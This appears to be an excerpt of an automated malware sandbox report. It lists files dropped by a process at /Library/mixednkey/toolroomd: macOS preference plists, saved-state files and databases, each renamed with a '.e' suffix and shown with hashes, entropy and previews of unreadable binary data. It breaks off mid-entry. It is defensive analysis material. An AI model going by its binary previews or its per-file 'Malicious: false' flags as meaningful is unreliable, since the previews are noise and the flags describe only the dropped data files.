SSDEEP:	6:Uq08Z2eRTzDrSglBBZ3NItKXUBzsewLYHEec/LaqG8rQQwiQ/6:UiNrSAHgsewLYTc+qGm7
MD5:	2E93A1D97E91FDEEF40A74ABF0EFF70B
SHA1:	AD904E980650F5184A3B2250831F28B764BEC15A
SHA-256:	3C737BF7371C7BBB0AC2FD2592C332C4DA07531ACAE98EE2894123E44C058E5D
SHA-512:	8790D893147EC6B59D406ADAD052A2668420E57FEB4433E04734EF2E8D3CE06D1DBBB4684BDE785E4C60BF5B4BBC92F1438822BE5D18721B18593837F10FB547
Malicious:	false
Preview:	...a>k..lUY>............!..km.D.;E..h.t..}.......rj.N.Up...l....2..\..Q.]>..x..6....rW..t....Sq6<.."a..58...,...y.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Preferences/.com.apple.textInput.keyboardServices.textReplacement.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1114
Entropy (8bit):	7.2948246071389455
Encrypted:	false
SSDEEP:	24:Uw8fEvH9S7hl59KiJ9hIpvkIOX9wP9vrDibnb2chvERURQsePc0m7:gEvHE59PM+2PJrDiv2chvERUONpq
MD5:	8E965364AF091820EA0C912D3E814C6B
SHA1:	04C0199F7276EEC2FCBF473F6AC39A7E63C84A2C
SHA-256:	11C129A1646B5646089798EEA3CF074D6962097ECD391F608B3897F75E9B8D4C
SHA-512:	D57434EBD48876953ABE469FD6FAEC4E2632266C9570D252DCC7396B1E9CDFADB95221DF5C46FABFFA7F81CFFCFBCE81A7CAE327A66876B3C4B02EA9ED237948
Malicious:	false
Preview:	...a>k..eoxr...n..G..F.sk.`dQ.GK5.ir.s...a....:....r#$W....?....../=6..EE..-...U.L.X.O5VxqZ...A.......P..mK.......C..(J....0t............`.]......4...`[.b....2G.uP......Vi.OsVSQ`{. q.3.>u"8...j........p.6L.yT ....O.[;3..:d...&%.Kv.}i..."T._...v.E.\|.Q.>/..](...z.E...".A.k..'........p.6L.yT ....OA.!.IT.m.Ey.eq.....,....P0.....`.....,vP?.x4{-m...'......J`w....."e.U.>/..](...z.E.....M....].fh'.k4..\1....y..m..x....:%~\|7.....o...'y.]T&..h..4.@.<.l.9..t.8g./.........]u...f.->.(..u...2.0.......\1....S..N.A7....c.+$..o.....{R..K#.u.s[.....U..O..)u...2.0.._......9-b....]sl...9'.5..."z.r../..c.T.'...m....x....2.......h......9+...T_...+.J.P+].8....l..czt..3\|.r..p.T_W.....hi~.]q.Fz=...5!1D.y..S.f..35....1..`3..V8.z..-.....B../:G.....,.....X.,.X..6<.."a..I.qmr"W..).................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..................................

/Users/berri/Library/Preferences/.com.microsoft.OneDriveStandaloneUpdater.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	530
Entropy (8bit):	6.073533317089728
Encrypted:	false
SSDEEP:	12:UmGkV0272Q5SDAEDeEPUh99b1XsewLYTc+qGm7:U/00cGAh2W9p1XsePc0m7
MD5:	53036DA69DE0E0BC5B66AE3A2CCA64F3
SHA1:	D6215B4539963B10F9C9B72604DE784192482621
SHA-256:	AFA2D335A6C49DF3EA369400E077FAC7CECFAEFE1270EE527884B2737B5758AD
SHA-512:	4524B5AED7EBEC9B1D2263A57915FE841673AFD95B0AA62FFA23E95427133CE895F48D9234C15C5E4D096CA12CAE652E39CAF6ED3E5A6B71C19D011D93EEAB97
Malicious:	false
Preview:	...a>k...6...\.50....{..US.1.]....3..o....sI....y.:...J._T\m.........SE.[..m......._....R..%.y.N.i..w....pQ...82..L.VE=.`..zJ..Z.....(3.c0F.yH.tv..D~.....A.5...f..}"...j.T.."..s.D:?.Eo;.Z...SV.6<.."a.......I....................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Preferences/.com.microsoft.OneDriveUpdater.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	426
Entropy (8bit):	5.497132247945253
Encrypted:	false
SSDEEP:	6:UqjNvas+BN0RLTbVWrqPX2em6gADBzsewLYHEec/LaqG8rQQwiQ/6:UMlasAN0RLz/rm1ApsewLYTc+qGm7
MD5:	ABA9128E4CB151EEE5DF62CBD59BEFB4
SHA1:	2090D673E136E618B346821EAF10DC04BB95E852
SHA-256:	89C65E0C2E35F2CC9FE26DB77E194D77251D4A1A32DAE45AE383C850FA3B2CA7
SHA-512:	0A6C222961354CD25F27C531CA0E38BB69DBB5F26318CD5510C6E9ADB2A23484130110DEFFA2E24834DA17C4120BB3F280B619084EA0A945634539B1EA6A3E5C
Malicious:	false
Preview:	...a>k..^..(\..d\.o...X.w..-.w..F....../.5yj.dM...P......z......Gl.....{.+.m.Z..CC......T.6<.."a...T.........pQ...y.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Preferences/.com.microsoft.autoupdate.fba.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	842
Entropy (8bit):	6.970982799313915
Encrypted:	false
SSDEEP:	24:UCd1yKCqa4e4vkp9+54A14rR2WsePc0m7:P8qRe0SbR2WNpq
MD5:	C2D65FD024BE10A2DB585F8BD485DF1A
SHA1:	50E18DD4523A45810B902363AA12FF72393D6F21
SHA-256:	DE13EDD76D5C294485ADE3BC94285F8DA18682C1A0B803275127047519B778C0
SHA-512:	E0721825C8A68CBD00FB14FFB03E453D2C421F9F83AA9350516D2F9FA5CF8C7D09156615CD4695E1620215CBC2A25B140828E57AF230AF18F1385874AA6D5F0E
Malicious:	false
Preview:	...a>k...P..4..._E.....;g3..S1..j(Dt...f.h.sg^T.#..T..z..""r..sk~D..)1.'..9.h...\0-_..uz..o..@...GQJ.......Sd.,...!.7i}q./]]..i......!.....5o......b0..!...eyv?x.3...]g,jB..Ym3.d.V..,.H.6 .X.zwF......8$.-..n.m..r.".K...lrAkI~..FR.\.o...X.....:.pTj5....m.M@.:a...Yl..!.zk.q.1K.F.D.,^....fS..:......~.o..a.......... ...o..J...._.....il..x..6...V[....F....d...6...<Id6..0a.H+b.Q.b..q..'.g\{.3u...MC.K%..L..h..g.9.w.A..6#.et.....h...."....../.U(...o..oA..C......F..g.l......i.l..u7uA+\|.Y....6<.."a....W!j.....................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Preferences/.com.microsoft.autoupdate2.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1562
Entropy (8bit):	7.529415980385685
Encrypted:	false
SSDEEP:	48:qchgcICKaiYMt71t97dYktEa3f/Ac79FNpq:qcOcL9MtN+ktEa3nAiFu
MD5:	F8BFFA20A7FD2CF2C1E2CD4D4514DC02
SHA1:	50535F15D1DD9FE6183783511D0E23BD53DA76D6
SHA-256:	5B3C8DF147843128CBEED656D2BB21C2BFFB78537C94C32184633DB8FFF37656
SHA-512:	6EF55AED55AC0D1056B2048F2283968FCD3D232DBB1BA2B37C3E520CCCA37914C372D3A3FEBE8B079F88D97B37DD34C0C65FBEFC43464E8C04767D42B346061C
Malicious:	false
Preview:	...a>k......h..G..F.;=g.f.........`C ..........AK...X.D-.X...;......^9=...m._p..8..yO....".)....j{7Z....l.&.m...zZ.0.........s.W].G....D.)PN....aq....~.x...K..j....&Mf..P..'.D-..8B..,...>.....Y..;.j.c.>....I..Vt.?g...O....4kH..u..d..q.t8...9(3..X...z..8...x.r..r%.&..K.2.V&.T...Z.a.\|.s..o.I...O..kc;N......K.(.x.aC9...q...Ry.!..x..O...k....W.-....=..1+..k.-.2..#/+ZLN.uc..4.....B\|....?.}.#.......gU.!..T.....1$.).)":...&f.T..{....4A.L.Q..}.M.....Sb..j2z.. ..%,.@.TFY....xOF.P............'.\....3.4...2.........B..Th.Vc...+.....STx..n....<Z[.x..../K......}.L...0.9ptn..B..\..EUv...U..8.</.?RLa..{...6(i.CNLk.`.MW...UEW.\..&.E...95..i.....0P.9$..64o...5....f......8w....=M-..l ......l.&....BB.v.pY..j....W7z.K.5...\ ....^..)`.82..L.V3..O'......BB.v...*.q.}...t...qL.~Ez$.G.T....'O.a)..y ....2..#'.D>f\|.qR`tm..[.-H+.k.).[.Z.>.UI...hSU...o~..E....of.E...i..x..O...kLL...h.7....b./...0.}..T.[.T...hSU..7D....s......5.x..O...k..Y..J.:......

/Users/berri/Library/Preferences/.com.microsoft.office.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1554
Entropy (8bit):	7.514583916129869
Encrypted:	false
SSDEEP:	24:UCRsDGLd422ioi7z7rWcA6IbMX0A1uvoCmZB02gVUMNdJGVpE5wpkVG2iYdsePcx:tRsYn2ioi/7rpgwhsUMopiw52iYdNpq
MD5:	DEB8433CBB10392901DD587CEBC35FE7
SHA1:	D9F7AF46724BD8D61A43BBC8716F594B99EE7CFD
SHA-256:	B4138189A3836D7B385FC62602406D7083A3EEE425DA354BEAC41364C02264AB
SHA-512:	CC38391FACE6AFEF27420C8B0B60F4B499E1C7C5601E4E86783FFA22CD51B5095AA20E8CE49FEB2806614D198D1B9E72BC285735F045055EC7C68C831A321BA4
Malicious:	false
Preview:	...a>k...2\|..3/..G..F.X.?NF..m...s.:.....-j.KUJ43.(..@....o...-.2........4.m7..D}UN.....nv...@......... ..P....o.]....c".=..)>..P.....$.C...3.F.d.J....p..6y..1YM....m.n..:.L..d.2.Q.....`..n..WNF.+w..K6...L=<.......(..B...:W.>....."..d0...;...v0...s...c!.0.I...8!%L....}f:..i.&'E....G.m..)..V.:.... ...]..[........Z...:....h}. ...rp.(.}.\..?...Q..tV.....DJ...e.:.$......s...c.V.t0....+^..Q.9]..5....j.8.(\T..i...#f...s...c!.0.I....#...i.4.....#..#...g.......pSUJV].@.DQ....Pb.....a..p.......e[Nt.(.i...3.B....<...@.H.....}f:..i....\+......d.H9.b.5.$..c..C....x....U..T<..j.A....q..c....Z..c...~...,XWN...m#zF.5.K....w....../.J...s....H.Lx?.........qL....cH....L.!.R........F....A..8.Cjs...{x.......5..._.6.C.G.tY.....L.G8.,.....Q..m..)..V..o.U$..[..6....&..v.....).!/}...... $W...8-..5....J.\|y.!g...$a\..8$W...8-..5....J...&u....\hR.7r{\.q....$.7..>..nI.G..;.;v:...`..Y./...o.dz....Cu5K.n...DS....X'...j.Z....v.z.&0ka....n.L..(x...E_.;.X%L..bJ..

/Users/berri/Library/Preferences/.com.microsoft.shared.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	354
Entropy (8bit):	4.873963429841272
Encrypted:	false
SSDEEP:	6:Uq2DtKhWUj08BzsewLYHEec/LaqG8rQQwiQ/6:UpZKh1oYsewLYTc+qGm7
MD5:	2F00DA96DAF267D918144135A57C3874
SHA1:	209FF3EFA3331BCC7C2EC6F3094280AA5C622AFA
SHA-256:	2ABCFCF34B0CA2F2688FC3D5388166B8340707B48ADB8531B977A8067D8789BB
SHA-512:	A317C24EA9567ADE1B09D996D802E46FE1CBFD122AD8755F462E4CBEDA579DE969C579C713F4705B45EC1383B0A3279CC6BE838DAE49315B8309A0B501951CBE
Malicious:	false
Preview:	...a>k..!f.%..-....y..)...c..kU6<.."a....pk.C..1.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Preferences/ByHost/.com.apple.ManagedClient.3A7FAF4A-609F-48E7-9855-8176C0BDCC67.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	386
Entropy (8bit):	5.194635223538061
Encrypted:	false
SSDEEP:	6:UqEIzpzxB208pGPmrA8BzsewLYHEec/LaqG8rQQwiQ/6:UoxbsnsewLYTc+qGm7
MD5:	36F974BDC03BB23BDDE6DCA208A8B260
SHA1:	07DF71CC09C1E4FBE48A408B32777875A6CA9571
SHA-256:	5B360050EEC10958A7F214496BE205172C8BAA110A4C249D9A7D854CEA7B936E
SHA-512:	B247DA08E4E41C341241B5F1FC619AB84CFA006F85D86406EF2A93A1E25D976F8B0C91E4B13F19532E895122F23D79C581EBD465A2BFE51A674B8D63D4CAD1D9
Malicious:	false
Preview:	...a>k....t.....fS.....r..>.Z..\..~U.;7.....s...y..)..X.....6<.."a..Xn.x6.q..Q.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Preferences/ByHost/.com.apple.commcenter.csidata.3A7FAF4A-609F-48E7-9855-8176C0BDCC67.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	570
Entropy (8bit):	6.2402369241187445
Encrypted:	false
SSDEEP:	6:Uq54J5z8wBY6v7myaWTj4w6IdPv5K0H62UZBPQJBzsewLYHEec/LaqG8rQQwiQ/6:UJJ5nvvSQTjf3U0HABPMsewLYTc+qGm7
MD5:	623D4E906C26AF91FDC90C8D5F7DE9B7
SHA1:	70CBB4E0BE9B83AA25D7A3F02A7BDA4AFE8CAD09
SHA-256:	DED332F6AA6A81D99F1AD684A139537C0F615C49E668FCBA0D2269AD273BEACC
SHA-512:	60D6219AAFA1A50C3072987708DE1A9344B4799E1D817485C8E28B9D39DCB1150F3C4895B0FAA0B2FCCF165B0E1D8F665B151E78F374B95A8B82F0EF6849068A
Malicious:	false
Preview:	...a>k.....1qc./..}........K1.=.&.X(....n....n..y.0.4..$.p.ZG....^...[.K..rX\|I.dW......GQJ...L.+c.e...J..r.....7.'......{...0........m....R.- \djK.....Q..WV.S.4./w..%$H;p......;p.@oyx)1bL.K.....E....N.....^O/i...b\|.K...y..)....w.{6<.."a..\D....?....................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Preferences/ByHost/.com.apple.coreservices.appleidauthenticationinfo.3A7FAF4A-609F-48E7-9855-8176C0BDCC67.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	482
Entropy (8bit):	5.8448271450153015
Encrypted:	false
SSDEEP:	6:Uq1mRiX//xoljHrzxk8mQg31aBzsewLYHEec/LaqG8rQQwiQ/6:ULo3xolzXmr3QsewLYTc+qGm7
MD5:	ED790C53B77D50F28BD1119C4D345213
SHA1:	3613C9725BF44CD227950D6AE82C25492E7B9C30
SHA-256:	F8793BE0FB320D6C6A804829A7716C2BF9E7EC143232DA7FA2D2DD5C1EE8D707
SHA-512:	6B6C8AB84CFDD3031A87357A3E118F5EE400AE637BB2B9CC6BCC621DCA0F284CFB3F992BCE2A314DBEC54420073CA9428A2E2B401D3239A847175762D685475D
Malicious:	false
Preview:	...a>k..t........@,H..A..5F ......ly.7.od.......l.\...I...[........v...........{.#..^+[g.m.o.P....>L4.m.,..,.Y..i.R.8Tvt..$...D...&.p.....rW..h.".m.6<.."a...V..b].....................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Preferences/ByHost/.com.apple.dock.3A7FAF4A-609F-48E7-9855-8176C0BDCC67.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	410
Entropy (8bit):	5.387289731072988
Encrypted:	false
SSDEEP:	6:Uq0oVtkCFZUWIS33S1OoxCH/aSIIqBzsewLYHEec/LaqG8rQQwiQ/6:UMC8ZURS33sRCfaSI5sewLYTc+qGm7
MD5:	61A1F095F0D9343ABD32463ADEA99437
SHA1:	2A69B61A9E63149C74154AAF01681428DF00DB4C
SHA-256:	CA5261D1DE1682A49540E63C66C12AB756BDA6089A0487877A4B964809FF0EB6
SHA-512:	C9679B97F58ACD12AA6F1BCA55B50F38825DAA9F345B92EFEF1D4023AA33EFDEEA0BE8CC3F90C1CF1132513F58F8FE81314380F6A009804612DE508AF1B33C44
Malicious:	false
Preview:	...a>k....,;..M.A..S.a..V....Vg....\zt.......vT..Bb,.j....sG...".&.Y....a(....d...W6<.."a..'a.-.]...i.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/PubSub/Database/.Database.sqlite3.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	143746
Entropy (8bit):	4.349529326357048
Encrypted:	false
SSDEEP:	384:2YuyHkjWqOme6wyuyHkUGE3pdxVuyuyHkFGE3pdxV4:2YLqWqOme6wyLNpdxVuyLMpdxV4
MD5:	66450713B5E896094E48A83DC48A92BA
SHA1:	309CA6F8A5432969854A842905D4ECDF1D39AB0A
SHA-256:	1168BD5D237C25C81C4E6C9F75E79D7E6224211D34E20701FDB99B4B6779FE94
SHA-512:	DF64EB72E974EB97ECDE8D1DBD84668443DF6BC68E29761CB23EF85F065EF52AF0CC639FB5FE3E93FBACDFC3E50EC4F35F4E5676476D77EF5828E1D87AA2DE69
Malicious:	false
Preview:	..d.=..._t.....}..........c.6<.."a..\|.+.d]..k..G..)......z..7...xt....Sq6<.."a..g..{}:.cd.hk...Q.78.%T ..Nn).+7..mG?.o.N..[i.....wG..v.7.W.(..86<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..ED..[....i{.cw..Ze..nH.h.....Y...,X.).;....6....!.j&..]......R......i.Y......M....X%.Q..D..%a...-..P....&...9..aC.ep..r.. 6.Xu..-.".k...].j.gw.Z.....A......\|..M...@.?.p.B.#.PP.".7..eg..N..V.J.{...z.J9.J....C..V.@O..O.........U...5. H;....OD...6*.d.....:.-.=.\|..B...q...I....h.>f....m..X..)..L.O.P\|...T..b.F.@.[."^..w..2{,..z..,........O.6.....~........(h. XB...z.. l...DB....#g+.#.^d...x7=s6.f9.u....WC...aU5#...;5.......~.MQ.&.w..z5..CK..u.....t."A.z..G....1....n..5.....S.e....#k{.........G....1..a.R."....u.JP..._._"\|8.1..N...B..'.......~I..{

/Users/berri/Library/Saved Application State/com.apple.finder.savedState/.data.data.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1786
Entropy (8bit):	7.476256958029931
Encrypted:	false
SSDEEP:	24:mPaLNsjsxcDncayqhDChc5VR+nMhc5VRTP9OMLNsjsxcDntwyq+FsePc0m7:4iNsjVhDCGVwnwGV5NNsjtg+FNpq
MD5:	DBE7F5495E20D45C7002D6C836D2EFE5
SHA1:	55E08C82A9ABE33BA57D5A408541B04DDC7C46A5
SHA-256:	CEE7C7871D1368095A4C3B01F5159ECD8B9384CEB273FEC3554F4D5F00CA8616
SHA-512:	D661506729E51CD2622E0D1159F15E7A16F46C3D3FA57FCC055554348C61ECB95B22D0A85EA109D0F44302FA97169756790D46588B3183D0C3088E19D6A2510D
Malicious:	false
Preview:	..k#.'.S(.=;....FM..6.zA....N....B.Yk[..TF.A.$V.CQ..y../uD...c..Fa..b._..=..J.E..q. ..!.Ob...g.......-?...7..M..t.4......8%...D?sTACV...........n'...=1DR ...A.....'.l....~...0.Z{..i....Z.% ...;.Q...0.?#D.G...1'dv............^.....8.Lr.d8..=w.g..5F..2..:.RT.g...;G5..s#{F........]..+.~.k.....4.!i..1HA....!...fy...%r.E..B^{C.H_..{$.E...,W.1...'Y.U.8......v..#:..".y..:.q.R...._....K.k..M.c.......CM8.gz./.u..k#.'.ScA.....&.......y9..<....:i.gax.^-.....;.2AK ...U,.W9.!.z/.$.T..Wo.6.I...I4.d..gc`.RH=.o.TU....\[$....I/...2...0Y...Hw>.kUI...X....DA.....3r..k.._...C,/....W.o{...E......'.ud.A.HY8.@>..z3.#Z...4......$....1)..Nq.....R1A...-.\.SJ'.}.ps.g...[~...;Y?..(W..7...3?......>....Mv.g...w......k#.'.ScA.....&.......y9..<....:i.gax.^-.....;.2AK ...U,.W9.!.z/.$.T..Wo.6.I...I4.d..gc`.RH=.o.TU....I.c#..I/...*2...0Y...Hw>.kUI...X....DA.....3K.t&......C,/....W.o{...E......'.ud.A.HY8.@>..z3.#Z...4......$....1)..Nq.....R1A...-.\.SJ'.}.ps.g...[~...;Y

/Users/berri/Library/Saved Application State/com.apple.finder.savedState/.window_1.data.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	5258
Entropy (8bit):	7.901147945080462
Encrypted:	false
SSDEEP:	96:AfpX+q4p1+meeY3aY3jSKUD1VZQsWfadyKu41OuBmiLu0BsR8gTT8rbj8oWu:+pX+qHGY3nTVs1IidycjBmidJ6Q/DD
MD5:	D4BDB5EFD9A4BB795890057B9B93D9B7
SHA1:	5D20804BFA808720324534312D7D2FC75785D500
SHA-256:	6E5E2D89C291B867451F045C1094CFDCE66D12A81E6E5A0AD2AF0DC695657B9C
SHA-512:	FDFF120ABCADB61BA0F6746FFFB1FB8AA810A8FB4B50F0DA2BEC4A0F32CBD412292C6A09251808E47837515E21A8AA03BD2C50DAE20347B0EE39DFC84E1E5596
Malicious:	false
Preview:	..S..g.+D=.y.G.cHb...8...>v...{O.@...;.....tD2. .hJ...t..\D...h...M.\.L=.\9..\|fq.8..j.{[.L...%.co.B.e.<......1W.2...\..<n..zCm.f^.&...BZ.2.n.8..K(.zJ3d......[m.6..z..........23@..R..`2....It{<}.9.r....!,.Q6.k.../s.....X.(g.&@9.A P&@CS..0.....U..@M..8C.8...<..~..RDU..~...LO. yM.x"vG.4..zj..;.E...Ot.RX..:.a._.o.q).n"...p.`.9i.7........r.r.L.TBn.l.9.7..bP...V..?...k..Qi>..4.h.T.(....#.@..m...bT.;....j....67..Y..C..(..% {..@.I..(@...j.9.%g{\....R...........@.K...#hZ....P.4..]p=..8....5..wsy.SR..N.%...x.....#..}.!....lvv....XlC0...6.P-.e.I....\|...S...r^;..p.[3T@.K.^.g..'.$-v.9`]..{....7.&.LJ$..7....P..F...$8.:..E...?...si3$CB?..^4...U..^Srq..%....-w.vi......{n.S...vR..F8..(\..(^...\....1h.p9....pMv..[..R8..3.?.........C7.2[k.../8>..t.C$.H..b...L..U....Ql[;<eS.-..i..U....'...q.....7.zDk.....?.TZ.,..."5..?Y.&.-&..0.9.7....j..~=g.=.t[.lZF..Y..M..wkZ1J.......zi.\|.....T.....&e..K\|....7.yU.....Cc.........,.....tw.>cF..9.......K/.....<....

/Users/berri/Library/Spelling/.dynamic-counts.dat.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	378
Entropy (8bit):	5.096503151481781
Encrypted:	false
SSDEEP:	6:UqDemict34lGp9BzsewLYHEec/LaqG8rQQwiQ/6:Uwt3T5sewLYTc+qGm7
MD5:	4FF7005AFBC8D0A091D81032E744772F
SHA1:	D8908D068555597726640494EA5E27F80F4972E5
SHA-256:	D0FE9D1A8368F8DFBA89C2D6D0EB350804041652783B2B18FE54485C1E96A875
SHA-512:	836896AEF91C00F8A1AE86EA1B041C203A1EC123265426ADA755C83F96043F84BE905B2DD987946B5CE527C305DA17B9EB2868532EC766800D17DBEAC8FE4A6E
Malicious:	false
Preview:	...a>k..OG.8.......U...k.\K.)]..7U........y..).....y.6<.."a...0)...s..I.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/com.apple.internal.ck/.history.db.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	45388
Entropy (8bit):	3.483087844627235
Encrypted:	false
SSDEEP:	24:x9ZnaN6000000000000000000000000N000000000000000000000000000000Nr:xfUunpIi3/9U05jjMzKLxN6N6iNpq
MD5:	2E166DFD22769C28F0310939738EF0F3
SHA1:	55AC6895AB3D3C3E6880B0CDF47D301EDEFE3C5B
SHA-256:	47D85BF547ECA1861BA56AEBE45C47BD3293D913CE9B01BC14E597C8D0749E52
SHA-512:	B050DA5B6BC94842B72255C0C18AC1DBD3C482C4AD6E18B87C93709869100B6C891B15ACEBF1F5FB10BF34ADF2D8F3C9FF80B1FB37A09CD4D011CE17AEF13444
Malicious:	false
Preview:	..d.=..._t.....}......y..,J.6<.."a........x6<.."a....7...x6<.."a..t....Sq6<.."a..VTZ..'......N.......xB....7.,. {4.m6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/com.apple.internal.ck/.main.db.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	45388
Entropy (8bit):	3.4867396484087014
Encrypted:	false
SSDEEP:	24:x9ZnaN6000000000000000000000000N000000000000000000000000000000NO:xfUunpIi3/9U05jjMzKLxf6e6iNpq
MD5:	B14C3B9AADE54D3DF91E1344C023A4BA
SHA1:	727ED76A26FEBA39E074DBACBBBEC6EE8CC28431
SHA-256:	CAB131998BBB0DA6F4CE442D0E9EAC02FAD8D19E5BDCB793D953326A77DDD955
SHA-512:	343EA16474DE3ED1BE7E471F4DBBB4117F3E3279758C27AB4099F37EE56B72CFB438D4A9A07527BE37525C99E66A5D61C76AFA659DFD69F23C1F3C775DC36965
Malicious:	false
Preview:	..d.=..._t.....}......y..,J.6<.."a........x6<.."a....7...x6<.."a..t....Sq6<.."a..VTZ..'......N.......xB....7.,. {4.m6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/com.apple.internal.ck/.synched.db.e Download File
Process:	/Library/mixednkey/toolroomd
